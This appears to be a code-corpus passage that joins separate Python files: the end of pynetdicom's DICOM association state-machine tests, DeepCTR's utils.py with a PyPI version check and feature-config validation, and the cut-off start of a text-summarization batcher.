b"\x00\x00\x00\x46\x01" # PDV Item 70
b"\x03" # PDV: 2 -> 69
b"\x00\x00\x00\x00\x04\x00\x00\x00\x42\x00\x00\x00" # 12 Command Group Length
b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38"
b"\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31\x00" # 26
b"\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00" # 10 Command Field
b"\x00\x00\x10\x01\x02\x00\x00\x00\x01\x00" # 10 Message ID
b"\x00\x00\x00\x08\x02\x00\x00\x00\x01\x01" # 10 Command Data Set Type
)
# Send associate request then c-echo requests then release request
commands = [
("send", a_associate_rq),
("recv", None),
("send", echo_rq),
("recv", None),
("send", echo_rq),
("recv", None),
("send", echo_rq),
("recv", None),
("send", echo_rq),
("recv", None),
("send", echo_rq),
("recv", None),
("send", echo_rq),
("recv", None),
("send", echo_rq),
("recv", None),
("send", echo_rq),
("recv", None),
("send", echo_rq),
("recv", None),
("send", echo_rq),
("recv", None),
("send", echo_rq),
("recv", None),
("send", echo_rq),
("recv", None),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
for ii in range(len(commands)):
scp.step()
scp.shutdown()
assert [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt9", "DT-1"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt9", "DT-1"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt9", "DT-1"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt9", "DT-1"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt9", "DT-1"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt9", "DT-1"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt9", "DT-1"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt9", "DT-1"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt9", "DT-1"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt9", "DT-1"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt9", "DT-1"),
("Sta6", "Evt10", "DT-2"),
("Sta6", "Evt9", "DT-1"),
("Sta6", "Evt12", "AR-2"),
("Sta8", "Evt14", "AR-4"),
("Sta13", "Evt17", "AR-5"),
] == fsm._changes[:30]
class TestStateMachineFunctionalRequestor:
"""Functional tests for StateMachine as association requestor."""
def setup(self):
"""Run prior to each test"""
self.ae = None
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = "ANY_SCU"
assoc.acceptor.address = "localhost"
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = "localhost"
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = ae.implementation_class_uid
assoc.requestor.implementation_version_name = ae.implementation_version_name
cx = build_context(Verification)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
self.orig_ar2 = FINITE_STATE.ACTIONS["AR-2"]
self.orig_ar4 = FINITE_STATE.ACTIONS["AR-4"]
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
FINITE_STATE.ACTIONS["AR-4"] = self.orig_ar4
FINITE_STATE.ACTIONS["AR-2"] = self.orig_ar2
time.sleep(0.1)
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_monkey_patch(self):
"""Test monkey patching of StateMachine works as intended."""
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
fsm = self.monkey_patch(assoc.dul.state_machine)
assert fsm.current_state == "Sta1"
fsm.current_state = "Sta13"
fsm.do_action("Evt3")
assert fsm._changes == [("Sta13", "Evt3", "AA-6")]
assert fsm._transitions == ["Sta13"]
def test_associate_accept_release(self):
"""Test normal association/release."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == "Sta1"
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
if self.assoc.is_established:
self.assoc.release()
timeout = 0
while self.fsm.current_state != "Sta1" and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
"Sta4", # Waiting for connection to complete
"Sta5", # Waiting for A-ASSOC-AC or -RJ PDU
"Sta6", # Assoc established
"Sta7", # Waiting for A-RELEASE-RP PDU
"Sta1", # Idle
]
assert self.fsm._changes == [
("Sta1", "Evt1", "AE-1"), # recv A-ASSOC rq primitive
("Sta4", "Evt2", "AE-2"), # connection confirmed
("Sta5", "Evt3", "AE-3"), # A-ASSOC-AC PDU recv
("Sta6", "Evt11", "AR-1"), # A-RELEASE rq primitive
("Sta7", "Evt13", "AR-3"), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == "Sta1"
scp.shutdown()
def test_associate_reject(self):
"""Test normal association rejection."""
self.ae = ae = AE()
ae.require_called_aet = True
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == "Sta1"
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
timeout = 0
while self.fsm.current_state != "Sta1" and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.assoc.is_rejected
assert self.fsm._transitions == [
"Sta4", # Waiting for connection to complete
"Sta5", # Waiting for A-ASSOC-AC or -RJ PDU
"Sta1", # Idle
]
assert self.fsm._changes == [
("Sta1", "Evt1", "AE-1"), # recv A-ASSOC rq primitive
("Sta4", "Evt2", "AE-2"), # connection confirmed
("Sta5", "Evt4", "AE-4"), # A-ASSOC-RJ PDU recv
]
assert self.fsm.current_state == "Sta1"
scp.shutdown()
def test_associate_accept_abort(self):
"""Test association acceptance then local abort."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == "Sta1"
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
if self.assoc.is_established:
self.assoc.abort()
timeout = 0
while self.fsm.current_state != "Sta1" and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
"Sta4", # Waiting for connection to complete
"Sta5", # Waiting for A-ASSOC-AC or -RJ PDU
"Sta6", # Assoc established
"Sta13", # Waiting for connection closed
"Sta1", # Idle
]
assert self.fsm._changes == [
("Sta1", "Evt1", "AE-1"), # recv A-ASSOC rq primitive
("Sta4", "Evt2", "AE-2"), # connection confirmed
("Sta5", "Evt3", "AE-3"), # A-ASSOC-AC PDU recv
("Sta6", "Evt15", "AA-1"), # A-ABORT rq primitive
("Sta13", "Evt17", "AR-5"), # connection closed
]
assert self.fsm.current_state == "Sta1"
scp.shutdown()
def test_associate_accept_local_abort(self):
"""Test association acceptance then local abort if no cx."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == "Sta1"
self.assoc.requestor.requested_contexts[0].abstract_syntax = "1.2.3"
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
timeout = 0
while self.fsm.current_state != "Sta1" and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
"Sta4", # Waiting for connection to complete
"Sta5", # Waiting for A-ASSOC-AC or -RJ PDU
"Sta6", # Assoc established
"Sta13", # Waiting for connection close
"Sta1", # Idle
]
assert self.fsm._changes == [
("Sta1", "Evt1", "AE-1"), # A-ASSOC rq primitive
("Sta4", "Evt2", "AE-2"), # connection confirmed
("Sta5", "Evt3", "AE-3"), # A-ASSOC-AC PDU recv
("Sta6", "Evt15", "AA-1"), # A-ABORT rq primitive
("Sta13", "Evt17", "AR-5"), # Connection closed
]
assert self.fsm.current_state == "Sta1"
scp.shutdown()
def test_associate_accept_peer_abort(self):
"""Test association acceptance then peer abort."""
self.ae = ae = AE()
ae.network_timeout = 0.5
ae.acse_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == "Sta1"
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 1
):
time.sleep(0.05)
timeout += 0.05
timeout = 0
while not self.assoc.is_established and timeout < 1:
time.sleep(0.05)
timeout += 0.05
timeout = 0
while not self.assoc.is_aborted and timeout < 1:
time.sleep(0.05)
timeout += 0.05
timeout = 0
while self.fsm.current_state != "Sta1" and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
"Sta4", # Waiting for connection to complete
"Sta5", # Waiting for A-ASSOC-AC or -RJ PDU
"Sta6", # Assoc established
"Sta1", # Idle
]
assert self.fsm._changes == [
("Sta1", "Evt1", "AE-1"), # A-ASSOC rq primitive
("Sta4", "Evt2", "AE-2"), # connection confirmed
("Sta5", "Evt3", "AE-3"), # A-ASSOC-AC PDU recv
("Sta6", "Evt16", "AA-3"), # A-ABORT-RQ PDV recv
]
scp.shutdown()
def test_associate_send_data(self):
"""Test association acceptance then send DIMSE message."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == "Sta1"
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
self.assoc.send_c_echo()
self.assoc.release()
timeout = 0
while self.fsm.current_state != "Sta1" and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
"Sta4", # Waiting for connection to complete
"Sta5", # Waiting for A-ASSOC-AC or -RJ PDU
"Sta6", # Assoc established
"Sta6",
"Sta6",
"Sta7", # Waitinf for A-RELEASE-RP PDU
"Sta1", # Idle
]
assert self.fsm._changes == [
("Sta1", "Evt1", "AE-1"), # A-ASSOC rq primitive
("Sta4", "Evt2", "AE-2"), # connection confirmed
("Sta5", "Evt3", "AE-3"), # A-ASSOC-AC PDU recv
("Sta6", "Evt9", "DT-1"), # P-DATA rq primitive
("Sta6", "Evt10", "DT-2"), # P-DATA-TF PDU recv
("Sta6", "Evt11", "AR-1"), # A-RELEASE rq primitive
("Sta7", "Evt13", "AR-3"), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == "Sta1"
scp.shutdown()
def test_release_AR6(self):
"""Test receive P-DATA-TF while waiting for A-RELEASE-RP."""
# Requestor sends A-RELEASE-RQ, acceptor sends P-DATA-TF then
# A-RELEASE-RP
# Patch AR-4 to also send a P-DATA-TF
def AR_4(dul):
# Send C-ECHO-RQ
dul.socket.send(p_data_tf)
# Normal release response
dul.pdu = A_RELEASE_RP()
dul.pdu.from_primitive(dul.primitive)
# Callback
dul.socket.send(dul.pdu.encode())
dul.artim_timer.start()
return "Sta13"
# In this case the association acceptor will hit AR_4
FINITE_STATE.ACTIONS["AR-4"] = ("Bluh", AR_4, "Sta13")
self.ae = ae = AE()
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == "Sta1"
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
self.assoc.release()
timeout = 0
while self.fsm.current_state != "Sta1" and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
"Sta4", # Waiting for connection to complete
"Sta5", # Waiting for A-ASSOC-AC or -RJ PDU
"Sta6", # Assoc established
"Sta7",
"Sta7", # Waiting for A-RELEASE-RP PDU
"Sta1", # Idle
]
assert self.fsm._changes == [
("Sta1", "Evt1", "AE-1"), # A-ASSOC rq primitive
("Sta4", "Evt2", "AE-2"), # connection confirmed
("Sta5", "Evt3", "AE-3"), # A-ASSOC-AC PDU recv
("Sta6", "Evt11", "AR-1"), # A-RELEASE rq primitive
("Sta7", "Evt10", "AR-6"), # P-DATA-TF PDU recv
("Sta7", "Evt13", "AR-3"), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == "Sta1"
scp.shutdown()
def test_release_AR7(self):
"""Test receive P-DATA primitive after A-RELEASE-RQ PDU."""
def AR_2(dul):
"""AR-2 occurs when an A-RELEASE-RQ PDU is received."""
# Add P-DATA primitive request
primitive = C_ECHO()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = Verification
# Send C-ECHO request to the peer via DIMSE and wait for the response
dul.assoc.dimse.send_msg(primitive, 1)
# Normal AR2 response
dul.to_user_queue.put(dul.primitive)
return "Sta8"
# In this case the association acceptor will hit AR_2
FINITE_STATE.ACTIONS["AR-2"] = ("Bluh", AR_2, "Sta8")
self.ae = ae = AE()
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == "Sta1"
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
self.assoc.release()
timeout = 0
while self.fsm.current_state != "Sta1" and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
"Sta4", # Waiting for connection to complete
"Sta5", # Waiting for A-ASSOC-AC or -RJ PDU
"Sta6", # Assoc established
"Sta7",
"Sta7", # Waiting for A-RELEASE-RP PDU
"Sta1", # Idle
]
assert self.fsm._changes == [
("Sta1", "Evt1", "AE-1"), # A-ASSOC rq primitive
("Sta4", "Evt2", "AE-2"), # connection confirmed
("Sta5", "Evt3", "AE-3"), # A-ASSOC-AC PDU recv
("Sta6", "Evt11", "AR-1"), # A-RELEASE rq primitive
("Sta7", "Evt10", "AR-6"), # P-DATA-TF PDU recv
("Sta7", "Evt13", "AR-3"), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == "Sta1"
scp.shutdown()
class TestStateMachineFunctionalAcceptor:
"""Functional tests for StateMachine as association acceptor."""
def setup(self):
"""Run prior to each test"""
self.ae = None
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = "ANY_SCU"
assoc.acceptor.address = "localhost"
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = "localhost"
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = ae.implementation_class_uid
assoc.requestor.implementation_version_name = ae.implementation_version_name
cx = build_context(Verification)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
self.orig_entry = FINITE_STATE.ACTIONS["AE-2"]
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
FINITE_STATE.ACTIONS["AE-2"] = self.orig_entry
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_invalid_protocol_version(self):
"""Test receiving an A-ASSOC-RQ with invalid protocol version."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == "Sta1"
def AE_2(dul):
dul.pdu = A_ASSOCIATE_RQ()
dul.pdu.from_primitive(dul.primitive)
dul.pdu.protocol_version = 0x0002
bytestream = dul.pdu.encode()
dul.socket.send(bytestream)
return "Sta5"
FINITE_STATE.ACTIONS["AE-2"] = ("Bluh", AE_2, "Sta5")
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
assert self.assoc.is_rejected
assert self.assoc.acceptor.primitive.result == 0x01
assert self.assoc.acceptor.primitive.result_source == 0x02
assert self.assoc.acceptor.primitive.diagnostic == 0x02
timeout = 0
while self.fsm.current_state != "Sta1" and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm.current_state == "Sta1"
scp.shutdown()
class TestEventHandling:
"""Test the FSM event handlers."""
def setup(self):
self.ae = None
def teardown(self):
if self.ae:
self.ae.shutdown()
def test_no_handlers(self):
"""Test with no handlers bound."""
self.ae = ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
ae.add_requested_context("1.2.840.10008.1.1")
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
scp.shutdown()
def test_transition_acceptor(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
ae.add_requested_context("1.2.840.10008.1.1")
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.release()
timeout = 0
while scp.active_associations and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, "current_state")
assert hasattr(event, "fsm_event")
assert hasattr(event, "action")
assert hasattr(event, "next_state")
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
assert event.event.name == "EVT_FSM_TRANSITION"
assert event.event.description == "State machine about to transition"
states = [ee.current_state for ee in triggered]
assert states[:6] == ["Sta1", "Sta2", "Sta3", "Sta6", "Sta8", "Sta13"]
scp.shutdown()
def test_transition_acceptor_bind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
ae.add_requested_context("1.2.840.10008.1.1")
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
time.sleep(0.5)
child = scp.active_associations[0]
assert child.dul.state_machine.current_state == "Sta6"
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
scp.bind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.release()
timeout = 0
while scp.active_associations and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, "current_state")
assert hasattr(event, "fsm_event")
assert hasattr(event, "action")
assert hasattr(event, "next_state")
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ["Sta6", "Sta8", "Sta13"]
def test_transition_acceptor_unbind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
ae.add_requested_context("1.2.840.10008.1.1")
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
# Confirm that the handler is bound
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
time.sleep(0.5)
# Acceptor association
child = scp.active_associations[0]
# At this point we *must* have gone Sta1 -> Sta2 -> Sta3 -> Sta6
assert child.dul.state_machine.current_state == "Sta6"
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
# Unbind the handler and confirm that its unbound
scp.unbind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
# Should go Sta6 -> Sta8 -> Sta13
assoc.release()
timeout = 0
while scp.active_associations and timeout < 10:
time.sleep(0.05)
timeout += 0.05
time.sleep(0.5)
for event in triggered:
assert hasattr(event, "current_state")
assert hasattr(event, "fsm_event")
assert hasattr(event, "action")
assert hasattr(event, "next_state")
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
print(states)
assert states[:3] == ["Sta1", "Sta2", "Sta3"]
scp.shutdown()
def test_transition_requestor(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
ae.add_requested_context("1.2.840.10008.1.1")
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(("", 11112), block=False)
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assert assoc.is_established
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
timeout = 0
while not assoc.is_released and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, "current_state")
assert hasattr(event, "fsm_event")
assert hasattr(event, "action")
assert hasattr(event, "next_state")
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:5] == ["Sta1", "Sta4", "Sta5", "Sta6", "Sta7"]
scp.shutdown()
def test_transition_requestor_bind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
ae.add_requested_context("1.2.840.10008.1.1")
scp = ae.start_server(("", 11112), block=False)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.bind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
timeout = 0
while not assoc.is_released and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, "current_state")
assert hasattr(event, "fsm_event")
assert hasattr(event, "action")
assert hasattr(event, "next_state")
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:2] == ["Sta6", "Sta7"]
scp.shutdown()
def test_transition_requestor_unbind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
ae.add_requested_context("1.2.840.10008.1.1")
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(("", 11112), block=False)
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.unbind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
timeout = 0
while not assoc.is_released and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, "current_state")
assert hasattr(event, "fsm_event")
assert hasattr(event, "action")
assert hasattr(event, "next_state")
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ["Sta1", "Sta4", "Sta5"]
scp.shutdown()
def test_transition_raises(self, caplog):
"""Test the handler for EVT_FSM_TRANSITION raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger="pynetdicom"):
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
timeout = 0
while scp.active_associations and timeout < 10:
time.sleep(0.05)
timeout += 0.05
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_FSM_TRANSITION' event "
"handler 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
|
utils.py | import collections
import json
import logging
from threading import Thread
import requests
from tensorflow.python.keras.layers import Concatenate
from .activations import *
from .layers import *
from .sequence import *
try:
from packaging.version import parse
except ImportError:
from pip._vendor.packaging.version import parse
custom_objects = {'InnerProductLayer': InnerProductLayer,
'OutterProductLayer': OutterProductLayer,
'MLP': MLP,
'PredictionLayer': PredictionLayer,
'FM': FM,
'AFMLayer': AFMLayer,
'CrossNet': CrossNet,
'BiInteractionPooling': BiInteractionPooling,
'LocalActivationUnit': LocalActivationUnit,
'Dice': Dice,
'SequencePoolingLayer': SequencePoolingLayer,
'AttentionSequencePoolingLayer': AttentionSequencePoolingLayer,
'CIN': CIN,
'InteractingLayer': InteractingLayer,}
VarLenFeat = collections.namedtuple(
'VarLenFeatureConfig', ['name', 'dimension', 'maxlen', 'combiner'])
SingleFeat = collections.namedtuple(
'SingleFeatureConfig', ['name', 'dimension', ])
def concat_fun(inputs, axis=-1):
if len(inputs) == 1:
return inputs[0]
else:
return Concatenate(axis=axis)(inputs)
def check_version(version):
"""Return version of package on pypi.python.org using json."""
def check(version):
try:
url_pattern = 'https://pypi.python.org/pypi/deepctr/json'
req = requests.get(url_pattern)
latest_version = parse('0')
version = parse(version)
if req.status_code == requests.codes.ok:
j = json.loads(req.text.encode('utf-8'))
releases = j.get('releases', [])
for release in releases:
ver = parse(release)
if not ver.is_prerelease:
latest_version = max(latest_version, ver)
if latest_version > version:
logging.warning('\nDeepCTR version {0} detected. Your version is {1}.\nUse `pip install -U deepctr` to upgrade.Changelog: https://github.com/shenweichen/DeepCTR/releases/tag/v{0}'.format(
latest_version, version))
except Exception:
return
Thread(target=check, args=(version,)).start()
def check_feature_config_dict(feature_dim_dict):
if not isinstance(feature_dim_dict, dict):
raise ValueError(
"feature_dim_dict must be a dict like {'sparse':{'field_1':4,'field_2':3,'field_3':2},'dense':['field_4','field_5']}")
if "sparse" not in feature_dim_dict:
feature_dim_dict['sparse'] = []
if "dense" not in feature_dim_dict:
feature_dim_dict['dense'] = []
if not isinstance(feature_dim_dict["sparse"], list):
raise ValueError("feature_dim_dict['sparse'] must be a list,cur is", type(
feature_dim_dict['sparse']))
if not isinstance(feature_dim_dict["dense"], list):
raise ValueError("feature_dim_dict['dense'] must be a list,cur is", type(
feature_dim_dict['dense']))
|
batcher.py | #Most of this file is copied form https://github.com/abisee/pointer-generator/blob/master/batcher.py
import queue
import time
from random import shuffle
from threading import Thread
import numpy as np
import tensorflow as tf
import config
from . import data
import random
random.seed(1234)
class Example(object):
def __init__(self, article, abstract_sentences, vocab):
# Get ids of special tokens
start_decoding = vocab.word2id(data.START_DECODING)
stop_decoding = vocab.word2id(data.STOP_DECODING)
# Process the article
article_words = article.split()
if len(article_words) > config.max_enc_steps:
